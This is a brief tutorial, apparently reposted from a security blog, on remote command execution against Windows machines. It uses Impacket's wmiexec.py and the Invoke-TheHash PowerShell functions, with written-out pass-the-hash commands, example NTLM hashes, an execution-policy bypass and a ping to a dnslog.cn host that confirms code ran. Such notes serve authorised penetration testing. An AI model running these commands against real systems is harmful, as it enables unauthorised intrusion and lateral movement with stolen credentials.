  • Summary of remote command execution on Windows

    1. Using Impacket

    Impacket is a Python class library for low-level programmatic access to network protocols, including IPv4/IPv6, TCP, UDP, ICMP, IGMP, ARP, SMB1-3, MSRPC, NTLM, Kerberos, WMI and LDAP.

    git clone https://github.com/CoreSecurity/impacket.git
    cd impacket/
    python setup.py install

    cd examples/

    Demonstration using WMI (wmiexec.py):

    proxychains python wmiexec.py SERVER01/Administrator:password@10.x.x.x

    2. Invoke-TheHash-master

    Functions

    • Invoke-WMIExec
    • Invoke-SMBExec
    • Invoke-SMBEnum
    • Invoke-SMBClient
    • Invoke-TheHash

    Invoke-WMIExec

    • WMI command execution function.
    Example:

    Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose

    Invoke-SMBExec

    • SMB (PsExec) command execution function supporting SMB1, SMB2.1, with and without SMB signing.
    Example:

    Invoke-SMBExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose

    Example (check SMB signing requirements on the target):

    Invoke-SMBExec -Target 192.168.100.20

    Reproduction:

    Solution (set the PowerShell execution policy so the script can be loaded):

    Set-ExecutionPolicy -ExecutionPolicy UNRESTRICTED

    Invoke-SMBExec is commonly used for testing:

    Invoke-SMBExec -Target 10.x.190.8 -Username Administrator -Hash efd2aec67e96c7264873c255c08c872f -Command "ping xx.dnslog.cn -n 2"

    Tool download: https://github.com/Kevin-Robertson/Invoke-TheHash

  • Original article: https://www.cnblogs.com/0xdd/p/12433885.html